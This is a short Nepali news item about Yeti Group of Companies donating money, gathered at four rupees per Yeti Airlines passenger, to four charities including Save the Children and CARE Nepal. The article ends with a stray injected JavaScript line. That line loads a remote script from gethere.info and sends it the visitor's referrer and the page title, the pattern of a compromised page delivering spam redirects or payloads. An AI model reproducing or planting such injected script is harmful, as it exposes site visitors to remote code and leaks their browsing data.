सामाजिक उतरदायित्व कार्यक्रम अन्तर्गत यति ग्रुप अफ कम्पनीजले बिभिन्न चार सामाजिक संस्थाहरुलाई सहयोग गरको छ। बिहीबार काठमााडौमा आयोजित कार्यक्रममा यतिले नेपालमा सामाजिक कार्य गर्दे आएका सस्थाहरुलाई सहयोग गरेको हो। यतिले सेभ द चिल्ड्रेन, द युनाईटेड मिसन टु नेपाल, केयर नेपाल र ह्याबिट्याट फर ह्युमानिटि प्रत्येकलाई तीनलाख त्रिहतर हजार सोह्रुपैयाको चेक हस्तान्तरण गरेको हो। यति एयरलाईन्समा यात्रा गर्दा प्रत्येक यात्रुबाट छुटाईएको चार चार रुपैया संकलन गरेर सहयोग गरेको कार्यक्रममा जानकार दिईयो। यसअघि पनि सामाजिक उतरदायित्व कार्यक्रम अन्तर्गत एक करोड ३८ लाख १७ हजार आठ सय ५६ रुपैया बिभिन्न संघ संस्थाहरुलाइ प्रदान गरेको यतिले जनाएको छ।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;